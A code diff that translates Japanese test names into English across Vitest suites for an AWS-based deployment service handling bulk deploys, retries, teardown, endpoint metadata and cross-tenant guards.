-  it("不正な cursor は無視して最初から開始するべき", async () => {
+  it("should ignore invalid cursors and start from the beginning", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
 
@@ -139,7 +139,7 @@ describe("listDeployments", () => {
     expect(cmd.input.ExclusiveStartKey).toBeUndefined();
   });
 
-  it("Issue #862: cursor が allowlist 外の key を含むなら無視するべき (= injection 防御)", async () => {
+  it("Issue #862: should ignore cursors containing keys outside the allowlist (injection guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     // 攻撃者が任意 key/value を送る試行
@@ -153,7 +153,7 @@ describe("listDeployments", () => {
     expect(cmd.input.ExclusiveStartKey).toBeUndefined();
   });
 
-  it("Issue #862: cursor が長すぎたら無視するべき (= DoS 防御)", async () => {
+  it("Issue #862: should ignore overly long cursors (DoS guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     const cursor = "a".repeat(1024); // 512 上限超え
@@ -177,7 +177,7 @@ describe("listDeployments", () => {
     expect(cmd.input.ExclusiveStartKey).toBeUndefined();
   });
 
-  it("limit は 1〜200 にクランプされるべき", async () => {
+  it("should clamp limit to 1–200", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValue({ Items: [], LastEvaluatedKey: undefined });
 
@@ -193,7 +193,7 @@ describe("listDeployments", () => {
 describe("getDeployment", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("PK=DEPLOYMENT#<jobId> SK=META で GetItem を投げるべき", async () => {
+  it("should issue a GetItem on PK=DEPLOYMENT#<jobId> SK=META", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -204,7 +204,7 @@ describe("getDeployment", () => {
     expect(cmd.input.Key).toEqual({ PK: "DEPLOYMENT#01HABC", SK: "META" });
   });
 
-  it("行が無ければ undefined を返すべき", async () => {
+  it("should return undefined when the row is missing", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: undefined });
 
@@ -212,7 +212,7 @@ describe("getDeployment", () => {
     expect(out).toBeUndefined();
   });
 
-  it("tenantId が一致しない行はクロステナント漏洩防止で undefined を返すべき", async () => {
+  it("should return undefined for rows whose tenantId does not match (cross-tenant leak guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow({ tenantId: "tenant-other" }) });
 
@@ -220,7 +220,7 @@ describe("getDeployment", () => {
     expect(out).toBeUndefined();
   });
 
-  it("operator には teamLoginKey を含めて返すべき", async () => {
+  it("should include teamLoginKey for operators", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -229,7 +229,7 @@ describe("getDeployment", () => {
     expect(out?.teamLoginKey).toBe("SECRET_LOGIN_KEY_DO_NOT_LEAK");
   });
 
-  it("一覧では teamLoginKey を含めないべき", async () => {
+  it("listing should not include teamLoginKey", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
 

--- a/infrastructure/test/problem-deploy/deploy-retry.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-retry.test.ts
@@ -95,7 +95,7 @@ describe("validateRetryRequest", () => {
 describe("retryDeployments", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("FAILED row を PENDING に戻し、 event を re-publish して action='requeued' を返すべき", async () => {
+  it("should revert FAILED rows to PENDING, re-publish the event, and return action='requeued'", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: failedRow() }); // Get
     ddbSend.mockResolvedValueOnce({}); // Update FAILED → PENDING
@@ -177,7 +177,7 @@ describe("retryDeployments", () => {
     expect(ddbSend).toHaveBeenCalledTimes(3);
   });
 
-  it("複数 jobId の一部成功・一部スキップを 1 response でまとめて返すべき", async () => {
+  it("should bundle partial success / partial skip across multiple jobIds into a single response", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     // jobId 1: FAILED → requeued
     ddbSend.mockResolvedValueOnce({ Item: failedRow({ jobId: VALID_JOB_ID }) });

--- a/infrastructure/test/problem-deploy/deployment-status.test.ts
+++ b/infrastructure/test/problem-deploy/deployment-status.test.ts
@@ -3,12 +3,12 @@ import { DeploymentStatusSchema } from "../../lib/problem-deploy/handlers/deploy
 import { DELETED_LIKE_STATUSES } from "../../lib/problem-deploy/handlers/shared/constants";
 
 describe("DeploymentStatusSchema", () => {
-  it("auto-delete lifecycle status を許可すべき", () => {
+  it("should allow auto-delete lifecycle status", () => {
     expect(DeploymentStatusSchema.parse("EXPIRED")).toBe("EXPIRED");
     expect(DeploymentStatusSchema.parse("AUTO_DELETED")).toBe("AUTO_DELETED");
   });
 
-  it("EXPIRED / AUTO_DELETED は削除済み扱いにすべき", () => {
+  it("should treat EXPIRED / AUTO_DELETED as deleted", () => {
     expect(DELETED_LIKE_STATUSES.has("EXPIRED")).toBe(true);
     expect(DELETED_LIKE_STATUSES.has("AUTO_DELETED")).toBe(true);
   });

--- a/infrastructure/test/problem-deploy/describe-stack-handler.test.ts
+++ b/infrastructure/test/problem-deploy/describe-stack-handler.test.ts
@@ -49,7 +49,7 @@ function deps(options: { externalId?: string } = {}) {
 }
 
 describe("describeStackForDeployment input-shape diagnostics (regression #?)", () => {
-  it("detail.jobId が undefined のとき deploy.describe-stack.input-received を error level で emit し、 既存の missing required field エラーを保つべき", async () => {
+  it("should emit deploy.describe-stack.input-received at error level when detail.jobId is undefined and preserve the existing missing-required-field error", async () => {
     const { deps: d } = deps();
     const errSpy = vi.spyOn(console, "error").mockImplementation(() => {});
     try {
@@ -70,7 +70,7 @@ describe("describeStackForDeployment input-shape diagnostics (regression #?)", (
     }
   });
 
-  it("detail 自体が undefined のときも shape log を emit して missing required field を保つべき", async () => {
+  it("should still emit the shape log and report missing required field even when detail itself is undefined", async () => {
     const { deps: d } = deps();
     const errSpy = vi.spyOn(console, "error").mockImplementation(() => {});
     try {
@@ -88,7 +88,7 @@ describe("describeStackForDeployment input-shape diagnostics (regression #?)", (
     }
   });
 
-  it("正常 path (= jobId / namePrefix / region 全部揃う) では shape log を出さないべき", async () => {
+  it("should not emit the shape log on the normal path (jobId / namePrefix / region all present)", async () => {
     const { deps: d } = deps();
     const errSpy = vi.spyOn(console, "error").mockImplementation(() => {});
     try {
@@ -103,7 +103,7 @@ describe("describeStackForDeployment input-shape diagnostics (regression #?)", (
 });
 
 describe("describeStackForDeployment", () => {
-  it("competitorRoleArn がある場合は ExternalId 付き AssumeRole 後に DescribeStacks すべき", async () => {
+  it("should DescribeStacks after AssumeRole with ExternalId when competitorRoleArn is set", async () => {
     const { deps: d, ssmSend, stsSend, cfnSend, cfnClient } = deps();
 
     const out = await describeStackForDeployment(
@@ -137,7 +137,7 @@ describe("describeStackForDeployment", () => {
     expect(describeCmd.input.StackName).toBe("tc-microservice-migration-battle-team-1");
   });
 
-  it("AssumeRole metadata が無い旧 event は same-account DescribeStacks に倒すべき", async () => {
+  it("should fall back to same-account DescribeStacks for legacy events without AssumeRole metadata", async () => {
     const { deps: d, ssmSend, stsSend, cfnClient } = deps();
 
     await describeStackForDeployment(input, d);
@@ -150,7 +150,7 @@ describe("describeStackForDeployment", () => {
     });
   });
 
-  it("AssumeRole metadata が片方だけなら構成エラーにすべき", async () => {
+  it("should raise a config error if only one side of the AssumeRole metadata is present", async () => {
     const { deps: d } = deps();
 
     await expect(
@@ -166,7 +166,7 @@ describe("describeStackForDeployment", () => {
     ).rejects.toThrow("competitorRoleArn and externalIdParameterName must be provided together");
   });
 
-  it("current ExternalId で AssumeRole が失敗したら 1 世代前で再試行すべき", async () => {
+  it("should retry with the previous generation when AssumeRole fails on the current ExternalId", async () => {
     const { deps: d, ssmSend, stsSend } = deps();
     ssmSend
       .mockResolvedValueOnce({ Parameter: { Value: "current", Version: 3 } })

--- a/infrastructure/test/problem-deploy/disruption-fire.test.ts
+++ b/infrastructure/test/problem-deploy/disruption-fire.test.ts
@@ -62,19 +62,19 @@ const baseInput = (over: Partial<Parameters<typeof fireDisruption>[1]> = {}) => 
 describe("fireDisruption (#888)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("unknown_problem を返すべき (problemsDisruptions に entry が無い)", async () => {
+  it("should return unknown_problem (no entry in problemsDisruptions)", async () => {
     const { shared } = buildShared();
     const out = await fireDisruption(shared, baseInput({ problemId: "unknown" }));
     expect(out.kind).toBe("unknown_problem");
   });
 
-  it("unknown_disruption を返すべき (disruptionId が catalog に無い)", async () => {
+  it("should return unknown_disruption (disruptionId not in catalog)", async () => {
     const { shared } = buildShared();
     const out = await fireDisruption(shared, baseInput({ disruptionId: "nope" }));
     expect(out.kind).toBe("unknown_disruption");
   });
 
-  it("invalid_parameters を返すべき (operatorEditable allow-list 外の key)", async () => {
+  it("should return invalid_parameters (key outside operatorEditable allow-list)", async () => {
     const { shared } = buildShared();
     const out = await fireDisruption(shared, baseInput({ parameters: { evilKey: "exfil" } }));
     expect(out.kind).toBe("invalid_parameters");
@@ -150,14 +150,14 @@ describe("fireDisruption (#888)", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("no_targets を返すべき (event 配下に team 不在)", async () => {
+  it("should return no_targets (no teams under the event)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [] }); // team list 空
     const out = await fireDisruption(shared, baseInput());
     expect(out.kind).toBe("no_targets");
   });
 
-  it("PutEvents で FailedEntryCount > 0 なら throw して audit row を書かないべき", async () => {
+  it("should throw and not write audit rows when PutEvents reports FailedEntryCount > 0", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [{ teamId: "T1" }] }); // team list
     ddbSend.mockResolvedValueOnce({}); // idempotency Put
@@ -231,7 +231,7 @@ describe("listDisruptionAudit (#888)", () => {
 describe("listDisruptionCatalog (#888)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("event の problems[] に該当する disruption のみを catalog に出すべき", async () => {
+  it("should surface only disruptions matching event problems[] into the catalog", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {

--- a/infrastructure/test/problem-deploy/endpoints-metadata.test.ts
+++ b/infrastructure/test/problem-deploy/endpoints-metadata.test.ts
@@ -6,7 +6,7 @@ import {
 } from "../../lib/utils/endpoints-metadata";
 
 describe("parseEndpointSlot", () => {
-  it("最小構成 (= slot + default.from + default.key) を採用すべき", () => {
+  it("should adopt the minimal config (slot + default.from + default.key)", () => {
     expect(
       parseEndpointSlot({ slot: "main", default: { from: "cfn-output", key: "BaseUrl" } }),
     ).toEqual({
@@ -16,7 +16,7 @@ describe("parseEndpointSlot", () => {
     });
   });
 
-  it("overridable=true / label / description / appendPath を保持すべき", () => {
+  it("should preserve overridable=true / label / description / appendPath", () => {
     expect(
       parseEndpointSlot({
         slot: "users",
@@ -34,11 +34,11 @@ describe("parseEndpointSlot", () => {
     });
   });
 
-  it("from が cfn-output 以外なら undefined を返すべき", () => {
+  it("should return undefined when from is anything other than cfn-output", () => {
     expect(parseEndpointSlot({ slot: "x", default: { from: "manual", key: "Y" } })).toBeUndefined();
   });
 
-  it("slot が空文字 / key が空文字なら undefined を返すべき", () => {
+  it("should return undefined when slot or key is empty", () => {
     expect(
       parseEndpointSlot({ slot: "", default: { from: "cfn-output", key: "Y" } }),
     ).toBeUndefined();
@@ -49,7 +49,7 @@ describe("parseEndpointSlot", () => {
 });
 
 describe("parseEndpointsEnv", () => {
-  it("`{ [problemId]: ProblemEndpointSlot[] }` を採用すべき", () => {
+  it("should adopt the `{ [problemId]: ProblemEndpointSlot[] }` shape", () => {
     const raw = JSON.stringify({
       "hello-world-battle": [
         { slot: "frontend", default: { from: "cfn-output", key: "FrontendUrl" } },
@@ -72,14 +72,14 @@ describe("parseEndpointsEnv", () => {
     });
   });
 
-  it("空文字 / 不正 JSON / non-object は空 map を返すべき", () => {
+  it("should return an empty map for empty string / invalid JSON / non-object", () => {
     expect(parseEndpointsEnv(undefined)).toEqual({});
     expect(parseEndpointsEnv("")).toEqual({});
     expect(parseEndpointsEnv("{not-json")).toEqual({});
     expect(parseEndpointsEnv("[1,2,3]")).toEqual({});
   });
 
-  it("配列でない値 / 空配列の problemId は drop すべき", () => {
+  it("should drop non-array values / empty-array problemId", () => {
     const raw = JSON.stringify({
       "p-1": "not-array",
       "p-2": [],
@@ -88,7 +88,7 @@ describe("parseEndpointsEnv", () => {
     expect(Object.keys(parseEndpointsEnv(raw))).toEqual(["p-3"]);
   });
 
-  it("壊れた entry は drop し他は維持すべき", () => {
+  it("should drop broken entries while keeping the rest", () => {
     const raw = JSON.stringify({
       "p-1": [
         { slot: "good", default: { from: "cfn-output", key: "X" } },
@@ -109,17 +109,17 @@ describe("parseEndpointsEnv", () => {
 });
 
 describe("resolveDefaultUrl", () => {
-  it("appendPath 無しは base をそのまま返すべき", () => {
+  it("should return the base as-is when there is no appendPath", () => {
     expect(resolveDefaultUrl("https://example.com/")).toBe("https://example.com/");
     expect(resolveDefaultUrl("https://example.com")).toBe("https://example.com");
   });
 
-  it("appendPath を相対 path として base に合成すべき", () => {
+  it("should combine appendPath as a relative path onto the base", () => {
     expect(resolveDefaultUrl("https://example.com/", "/users")).toBe("https://example.com/users");
     expect(resolveDefaultUrl("https://example.com", "users")).toBe("https://example.com/users");
   });
 
-  it("appendPath が絶対 URL なら appendPath を採用すべき", () => {
+  it("should use appendPath when it is an absolute URL", () => {
     expect(resolveDefaultUrl("https://base.example.com/", "https://other.example.com/path")).toBe(
       "https://other.example.com/path",
     );

--- a/infrastructure/test/problem-deploy/event-archive.test.ts
+++ b/infrastructure/test/problem-deploy/event-archive.test.ts
@@ -32,7 +32,7 @@ function conditionalFailure(): Error {
 describe("archiveEvent", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系 (DRAFT): status を ARCHIVED に + archivedAt = now を SET するべき", async () => {
+  it("normal case (DRAFT): should SET status to ARCHIVED and archivedAt = now", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
 

--- a/infrastructure/test/problem-deploy/event-bulk-delete.test.ts
+++ b/infrastructure/test/problem-deploy/event-bulk-delete.test.ts
@@ -52,7 +52,7 @@ const dep = (over: Record<string, unknown> = {}) => ({
 describe("bulkTeardownEvent", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: Get(Event) 確認 → eventId フィルタ後 deployment を DELETING に並列更新し DeployDeleteRequested を publish するべき", async () => {
+  it("normal case: should Get(Event) confirm → filter deployment by eventId, parallel-update to DELETING, and publish DeployDeleteRequested", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // Get(Event)
     ddbSend.mockResolvedValueOnce({
@@ -104,7 +104,7 @@ describe("bulkTeardownEvent", () => {
     expect(putCmd.input.Entries?.[0]?.DetailType).toBe("DeployDeleteRequested");
   });
 
-  it("event 不在は not_found を返し Deployments query を呼ばないべき", async () => {
+  it("should return not_found without calling Deployments query when the event is absent", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: undefined });
 
@@ -114,7 +114,7 @@ describe("bulkTeardownEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("tenantId 不一致は not_found を返すべき (クロステナント漏洩防止)", async () => {
+  it("should return not_found on tenantId mismatch (cross-tenant leak guard)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent({ tenantId: "tenant-other" }) });
 
@@ -123,7 +123,7 @@ describe("bulkTeardownEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("既に DELETING / DELETED な行は skip して publish しないべき", async () => {
+  it("should skip and not publish for rows already DELETING / DELETED", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({
@@ -144,7 +144,7 @@ describe("bulkTeardownEvent", () => {
     }
   });
 
-  it("DeployDeleteRequested detail に AssumeRole metadata を含めるべき (#758)", async () => {
+  it("should include AssumeRole metadata in DeployDeleteRequested detail (#758)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({
@@ -172,7 +172,7 @@ describe("bulkTeardownEvent", () => {
     expect(detail.externalIdParameterName).toBe("/development/tenants/tenant-acme/external-id");
   });
 
-  it("event は存在するが deployment 0 件 (まだ deploy してない) なら enqueued=0 を返すべき", async () => {
+  it("should return enqueued=0 when the event exists but has 0 deployments (not yet deployed)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: [] });
@@ -182,7 +182,7 @@ describe("bulkTeardownEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("ConditionalCheckFailed (並行更新) は skip して例外を伝播しないべき", async () => {
+  it("should skip and not propagate exceptions on ConditionalCheckFailed (concurrent update)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     // Event status update (= 後続の 4th call) は通常 success を返す fallback。
     // #557 で 1 deployment + Event status の 2 件目 UpdateCommand が増えたため。
@@ -203,7 +203,7 @@ describe("bulkTeardownEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("Event status update が CCF (= ARCHIVED 等) でも例外を伝播せず deployment 削除は完了するべき (#557)", async () => {
+  it("should still complete deployment delete without propagating exceptions even if Event status update hits CCF (e.g. ARCHIVED) (#557)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent({ status: "ARCHIVED" }) });
     // GetCommand 後の "ARCHIVED" 判定は handler では行わないので Query へ進む。
@@ -229,7 +229,7 @@ describe("bulkTeardownEvent", () => {
     expect(out.kind).toBe("ok");
   });
 
-  it("Deployments query は GSI1 (TENANT) を引いて in-memory で eventId フィルタするべき", async () => {
+  it("Deployments query should hit GSI1 (TENANT) and filter eventId in-memory", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: [] });

--- a/infrastructure/test/problem-deploy/event-bulk-deploy.test.ts
+++ b/infrastructure/test/problem-deploy/event-bulk-deploy.test.ts
@@ -122,7 +122,7 @@ const sampleTeams = (n: number) =>
 describe("bulkDeployEvent", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: teams × problems を全展開して deployment 行を Put + DeployCreateRequested を publish するべき", async () => {
+  it("normal case: should expand teams × problems fully, Put deployment rows, and publish DeployCreateRequested", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // GetCommand
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(3) }); // QueryCommand teams
@@ -164,7 +164,7 @@ describe("bulkDeployEvent", () => {
     expect(putCmd.input.Entries?.[0]?.DetailType).toBe("DeployCreateRequested");
   });
 
-  it("event 不在は not_found を返し DDB write / publish しないべき", async () => {
+  it("should return not_found without DDB write / publish when the event is absent", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: undefined });
 
@@ -174,7 +174,7 @@ describe("bulkDeployEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("tenantId 不一致は not_found を返し書き込みを行わないべき (クロステナント漏洩防止)", async () => {
+  it("should return not_found without writing on tenantId mismatch (cross-tenant leak guard)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent({ tenantId: "tenant-other" }) });
 
@@ -184,7 +184,7 @@ describe("bulkDeployEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("teams または problems が 0 件なら enqueued=0 を返し書き込みしないべき", async () => {
+  it("should return enqueued=0 without writing when teams or problems is empty", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent({ problems: [] }) });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(3) });
@@ -195,7 +195,7 @@ describe("bulkDeployEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("カタログにない problemId は skipped にカウントするべき", async () => {
+  it("should count problemIds absent from the catalog as skipped", async () => {
     const { shared, ddbSend, eventsSend } = buildShared({
       problemsCatalog: { "hello-world": "problems/challenges/hello-world" },
     });
@@ -209,7 +209,7 @@ describe("bulkDeployEvent", () => {
     expect(out).toEqual({ kind: "ok", result: { eventId: "EV1", enqueued: 2, skipped: 2 } });
   });
 
-  it("TransactWrite は 25 items 上限で chunk 化するべき", async () => {
+  it("TransactWrite should chunk at the 25-items cap", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(15) });
@@ -226,7 +226,7 @@ describe("bulkDeployEvent", () => {
     expect(transactCmds[1]?.input.TransactItems).toHaveLength(5);
   });
 
-  it("PutEvents は 10 entries 上限で chunk 化するべき", async () => {
+  it("PutEvents should chunk at the 10-entries cap", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(15) });
@@ -243,7 +243,7 @@ describe("bulkDeployEvent", () => {
     expect(putCmds[2]?.input.Entries).toHaveLength(10);
   });
 
-  it("PutEvents の partial failure は該当 deployment を FAILED にして retry 可能にすべき", async () => {
+  it("PutEvents partial failure should mark the affected deployments as FAILED and keep them retryable", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) });
@@ -277,7 +277,7 @@ describe("bulkDeployEvent", () => {
     );
   });
 
-  it("PutEvents の timeout/reject は chunk 内 deployment を FAILED にして retry 可能にすべき", async () => {
+  it("PutEvents timeout/reject should mark the deployments in the chunk as FAILED and keep them retryable", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) });
@@ -306,7 +306,7 @@ describe("bulkDeployEvent", () => {
     ).toBe(true);
   });
 
-  it("各 deployment 行の ConditionExpression で同 jobId 二重生成を防ぐべき", async () => {
+  it("should prevent double creation on the same jobId via ConditionExpression on each deployment row", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) });
@@ -324,7 +324,7 @@ describe("bulkDeployEvent", () => {
     }
   });
 
-  it("Event.startsAt を deployment 行に eventStartsAt として denormalize するべき", async () => {
+  it("should denormalize Event.startsAt into the deployment row as eventStartsAt", async () => {
     // operator が Bulk Deploy 前に schedule 済 (startsAt 設定済) だった場合、
     // 新規 deployment 行が gate 値を持って作られるシナリオ。
     const { shared, ddbSend, eventsSend } = buildShared();
@@ -364,7 +364,7 @@ describe("bulkDeployEvent", () => {
     }
   });
 
-  it("#528: deployment 行の awsAccountId は **team** の awsAccountId を使うべき", async () => {
+  it("#528: should use the **team** awsAccountId for the deployment row's awsAccountId", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) });
@@ -418,7 +418,7 @@ describe("bulkDeployEvent", () => {
     }
   });
 
-  it("#528: team.awsAccountId も problem.defaultAwsAccountId も無いと skip するべき", async () => {
+  it("#528: should skip when neither team.awsAccountId nor problem.defaultAwsAccountId is present", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     // problem.defaultAwsAccountId を外した event
     ddbSend.mockResolvedValueOnce({
@@ -447,7 +447,7 @@ describe("bulkDeployEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("成功後に Event status を DRAFT → DEPLOYING に倒すべき (status badge 視認用)", async () => {
+  it("should flip Event status DRAFT → DEPLOYING after success (for status-badge visibility)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) });
@@ -471,7 +471,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: 既存 (teamId, problemId) と衝突する組は再 PUT しない (= idempotent skip)
-  it("既存 deployment 行と (eventId, teamId, problemId) が衝突する組は skipped に計上するべき", async () => {
+  it("should count combinations colliding with existing deployment rows on (eventId, teamId, problemId) as skipped", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) }); // 2 teams = 4 通り
@@ -490,7 +490,7 @@ describe("bulkDeployEvent", () => {
     expect(out).toEqual({ kind: "ok", result: { eventId: "EV1", enqueued: 2, skipped: 2 } });
   });
 
-  it("duplicate event で全組み合わせが既存 PENDING なら write / publish しないべき", async () => {
+  it("should not write / publish on duplicate event when every combination is already PENDING", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) }); // 1 team = 2 通り
@@ -510,7 +510,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: retryFailedOnly = true → FAILED 行のみ再生成、PENDING/COMPLETE はスルー
-  it("retryFailedOnly = true は FAILED 行だけ DELETE + 新規 PENDING を CREATE するべき", async () => {
+  it("should DELETE only FAILED rows and CREATE new PENDING rows when retryFailedOnly = true", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) }); // 2 teams = 4 通り
@@ -553,7 +553,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: retryFailedOnly でも FAILED が無ければ何もしない
-  it("retryFailedOnly = true で FAILED 行が 0 件なら enqueued=0 で write も publish もしないべき", async () => {
+  it("should return enqueued=0 without writing or publishing when retryFailedOnly = true and there are 0 FAILED rows", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) });
@@ -573,7 +573,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #756: forceRedeploy = true → COMPLETE 済み stack を新 template で update し直す
-  it("forceRedeploy = true は COMPLETE 行を DELETE + 新規 PENDING を CREATE するべき", async () => {
+  it("should DELETE COMPLETE rows and CREATE new PENDING rows when forceRedeploy = true", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) }); // 2 teams = 4 通り
@@ -606,7 +606,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: teamIds で range を絞る (= 後追い team / 該当 team の env だけ deploy)
-  it("teamIds 指定 で指定 team のみ deploy するべき", async () => {
+  it("should deploy only the specified teams when teamIds is supplied", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(3) }); // 3 teams、うち T2 のみ deploy
@@ -630,7 +630,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: problemIds で range を絞る (= 後追い問題 / 修正済問題だけ deploy)
-  it("problemIds 指定 で指定 problem のみ deploy するべき", async () => {
+  it("should deploy only the specified problems when problemIds is supplied", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() }); // 2 problems
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) }); // 2 teams、うち hello-world のみ
@@ -654,7 +654,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // #555: retryFailedOnly + teamIds の組み合わせ (= 特定 team の失敗だけ retry)
-  it("retryFailedOnly + teamIds の組み合わせで指定 team の FAILED だけ retry するべき", async () => {
+  it("should retry only FAILED rows for the specified team when retryFailedOnly + teamIds are combined", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(2) }); // T1, T2
@@ -689,7 +689,7 @@ describe("bulkDeployEvent", () => {
 
   // Phase 2.2 (Issue #459) Worker cross-account 化:
   // CompetitorAccounts table で verified=true 行が無い awsAccountId は reject されるべき
-  it("verified=false / 未登録の awsAccountId は plan から落ちて unverified に計上するべき", async () => {
+  it("should drop verified=false / unregistered awsAccountId from the plan and count it as unverified", async () => {
     const { shared, ddbSend, eventsSend, setVerifiedAccounts } = buildShared();
     // T1 (111111111111) のみ verified、T2 (222222222222) は未登録
